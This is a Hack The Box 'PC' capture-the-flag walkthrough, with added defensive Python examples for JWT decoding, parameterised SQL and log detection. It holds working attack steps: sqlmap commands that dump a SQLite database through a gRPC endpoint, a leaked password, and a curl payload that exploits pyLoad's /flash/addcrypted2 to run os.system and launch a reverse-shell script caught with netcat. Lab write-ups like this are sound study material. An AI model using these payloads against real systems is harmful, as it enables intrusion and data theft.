Hack The Box PC Walkthrough 

1.

First, connect to HTB using OpenVPN.

2.

Then we run an nmap scan against the two ports of interest:

nmap -sC -sV -Pn -p 22,50051 10.10.11.214

3.

-Pn: treat all hosts as online (skip host discovery)

-sC: equivalent to --script=default

-sV: probe open ports to determine service/version info

We see that gRPC is running on port 50051 and SSH is running on port 22 of the host machine.

4.

We then search GitHub for gRPC tools and use git clone.

5.

grpcui is a command-line tool that lets you interact with gRPC servers via a browser. It's sort of like Postman, but for gRPC APIs instead of REST.

6.

mkdir grpcui

7.

cd grpcui

8. 

mv ~/Downloads/grpcui_1.3.1_linux_x86_64.tar.gz .

9. 

tar xvf grpcui_1.3.1_linux_x86_64.tar.gz

10.

ls

11.

We then run the tool against the gRPC port. grpcui serves its web UI on a random local port each time it starts, which is why the port differs in the next step:

$ grpcui -plaintext 10.10.11.214:50051

gRPC Web UI available at http://127.0.0.1:60551/…

12.

Then we open Burp Suite and add http://127.0.0.1:44173/ to the target scope settings.

13.

Turn intercept on.

14.

Try the admin password on the site (time 222) and invoke the request.

15.

Copy the token:

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODc4NTM3MDJ9.QMhrmgZ4BwUJUAnegz0QTGOMTDTn3OED6riLCdDJJxI
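Before reusing a token like the one above it is worth seeing what it actually carries. The following added example (not part of the original walkthrough) splits the JWT into its three base64url segments and decodes the header and payload. The signature cannot be checked without the server's HMAC secret, so the decode is deliberately unverified and only inspects claims; the expiry check simply compares the exp claim against a supplied clock value.

```python
from __future__ import annotations

import base64
import json
import time

# Token copied from step 15 of the walkthrough.
TOKEN = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9."
    "eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODc4NTM3MDJ9."
    "QMhrmgZ4BwUJUAnegz0QTGOMTDTn3OED6riLCdDJJxI"
)


def _b64url_decode(segment: str) -> bytes:
    """Decode a base64url segment, restoring the '=' padding JWTs strip."""
    segment += "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment)


def decode_jwt_unverified(token: str) -> tuple[dict, dict]:
    """Return (header, payload) WITHOUT verifying the signature.

    The third segment is an HMAC over 'header.payload' keyed with the
    server's secret, which we do not have. This function is for inspecting
    claims only and must never be used to decide whether a token is valid.
    """
    header_b64, payload_b64, _signature_b64 = token.split(".")
    header = json.loads(_b64url_decode(header_b64))
    payload = json.loads(_b64url_decode(payload_b64))
    return header, payload


def token_is_expired(payload: dict, now: int | None = None) -> bool:
    """True when the 'exp' claim (seconds since the epoch) is not in the future."""
    if now is None:
        now = int(time.time())
    return int(payload.get("exp", 0)) <= now


if __name__ == "__main__":
    hdr, claims = decode_jwt_unverified(TOKEN)
    print("header :", hdr)      # alg HS256: symmetric key held by the server
    print("payload:", claims)   # user_id and exp claims
    print("expired now:", token_is_expired(claims))
```

Running it shows the token is an HS256 JWT whose payload names the user and an expiry timestamp, which is exactly the information a defender wants when deciding how long a leaked token stays usable.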

16. 
  1. Make the get info request

  2. Intercept it in Burp Suite

  3. Send it to Repeater

17.

Save the request to the sqlmap folder in the Kali home directory: /kali/home/sqlmap/sqlmap.req

18.

sqlmap -r sqlmap/sqlmap.req --batch -D SQLite --tables

19. 

sqlmap -r sqlmap/sqlmap.req --batch -D SQLite --dump-all
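sqlmap is able to dump the SQLite database because the get info handler splices the supplied id straight into its SQL text. The added example below (my own illustration, not code from the box) uses an in-memory SQLite table with constructed placeholder rows and shows the same lookup written two ways: string formatting, which lets the input change the query, and a bound parameter, which is the fix. The table and column names are assumptions.

```python
import sqlite3


def build_demo_db() -> sqlite3.Connection:
    """Constructed stand-in for the application's SQLite backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO accounts VALUES (?, ?)",
        [("admin", "placeholder-admin-pw"), ("sau", "placeholder-sau-pw")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    """Query assembled by string formatting: the input becomes SQL."""
    query = f"SELECT username, password FROM accounts WHERE username = '{user_id}'"
    return conn.execute(query).fetchall()


def lookup_hardened(conn: sqlite3.Connection, user_id: str) -> list:
    """Bound parameter: the value is passed to the engine separately from
    the SQL text, so quote characters in it are just data."""
    return conn.execute(
        "SELECT username, password FROM accounts WHERE username = ?", (user_id,)
    ).fetchall()


if __name__ == "__main__":
    db = build_demo_db()
    normal = "sau"
    hostile = "sau' OR '1'='1"   # constructed tautology input
    print("vulnerable, normal :", lookup_vulnerable(db, normal))
    print("vulnerable, hostile:", lookup_vulnerable(db, hostile))  # every row
    print("hardened,   normal :", lookup_hardened(db, normal))
    print("hardened,   hostile:", lookup_hardened(db, hostile))    # no row
```

With the hostile input the formatted query returns every account, while the parameterised query returns nothing because no username literally equals that string. Parameter binding, not input filtering, is the control that removes the injection class sqlmap is exploiting here.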

20.

Forward the request.

21.

Password: HereIsYourPassWord1431

22.
  1. ssh sau@10.10.11.214

  2. ls -lah user.txt

  3. curl -I -L 127.0.0.1:8000

23.

netstat -tlnp

24.

ssh sau@10.10.11.214 -L 8000:127.0.0.1:8000

(-L forwards local port 8000 through the SSH session to port 8000 on the box's loopback interface, so the service that only listens on 127.0.0.1 can be reached from the attacking machine.)

26.

Search for what pyLoad is.

27.

Look up the pyLoad exploit.

29.

ps -u root | grep pyload

30.
  1. cd /dev/shm on the PC machine

  2. nano rev.sh

  3. chmod +x rev.sh

31.

nc -lvnp 9001

32.

We then use the pyLoad exploit. The first attempt only creates a marker file to confirm code execution:

curl -i -s -k -X $'POST' \
    --data-binary $'jk=pyimport%20os;os.system(\"touch%20/tmp/pwnd\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
    $'http://localhost:8000/flash/addcrypted2'

Correct payload (runs the reverse shell script from step 30):

$ curl -i -s -k -X $'POST' \
    --data-binary $'jk=pyimport%20os;os.system(\"bash%20/dev/shm/rev.sh\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
    $'http://localhost:8000/flash/addcrypted2'
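From the defending side, the request above has a clear signature: the jk field of the /flash/addcrypted2 endpoint is meant to carry a JavaScript key function, yet here it begins with a Python "pyimport" and calls os.system. The added example below (mine, not from the walkthrough) runs that check over a few constructed log lines in a simple "ip method path body" format, as a reverse proxy with request-body logging in front of pyLoad might record them. The format and the lines are assumptions made for the example; the indicator strings come from the request on the page.

```python
from __future__ import annotations

import re
from urllib.parse import unquote

# Constructed sample log (not real traffic): "<client ip> <method> <path> <body>".
# A body of "-" means the request carried none.
SAMPLE_LOG = """\
10.10.14.5 POST /flash/addcrypted2 jk=pyimport%20os;os.system(%22touch%20/tmp/pwnd%22);f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa
127.0.0.1 GET /login -
127.0.0.1 POST /flash/addcrypted2 jk=function%20f(){return%20'abc'};&package=demo&crypted=QUFBQQ==
10.10.14.5 POST /flash/addcrypted2 jk=pyimport%20os;os.system(%22bash%20/dev/shm/rev.sh%22);f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa
"""

# Indicators taken from the request shown in the walkthrough: Python import
# syntax and a shell call inside what should be a JavaScript function.
SUSPICIOUS_JK = re.compile(r"pyimport|os\.system", re.IGNORECASE)


def extract_jk(body: str) -> str | None:
    """Return the URL-decoded value of the jk form field, or None if absent.

    The body is split on '&' by hand rather than with parse_qs because the
    jk value legitimately contains ';' which older parse_qs treated as a separator.
    """
    for field in body.split("&"):
        if field.startswith("jk="):
            return unquote(field[3:])
    return None


def find_addcrypted2_abuse(log_text: str) -> list[dict]:
    """Flag POSTs to /flash/addcrypted2 whose jk field looks like Python, not JS."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ip, method, path, body = line.split(" ", 3)
        if method != "POST" or path != "/flash/addcrypted2":
            continue
        jk = extract_jk(body)
        if jk is not None and SUSPICIOUS_JK.search(jk):
            hits.append({"ip": ip, "jk": jk})
    return hits


if __name__ == "__main__":
    for hit in find_addcrypted2_abuse(SAMPLE_LOG):
        print(f"ALERT {hit['ip']}: {hit['jk']}")
```

Only the two lines carrying Python in jk are reported; the benign click-and-load request with a real JavaScript key function passes. Because the body is percent-encoded on the wire, the decode step matters: matching on the raw "pyimport%20os" string would miss any request that encoded the characters differently.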

33.

cd /root

34.

Look for the flag.

Lessons Learned

The Hack The Box PC Challenge taught me valuable lessons that I will carry forward in my cybersecurity journey. Firstly, I learned the significance of thorough reconnaissance, which is always important when approaching any hacking endeavor. Secondly, I realized the importance of researching new technologies and exploits to expand my knowledge and skill set. Thirdly, I discovered that not all techniques will work, highlighting the need for adaptability and persistence. Despite the box being categorized as easy, it still required time and effort to navigate and find the right method to exploit it. These lessons have reinforced the importance of continuous learning and the need to approach challenges with a methodical mindset.
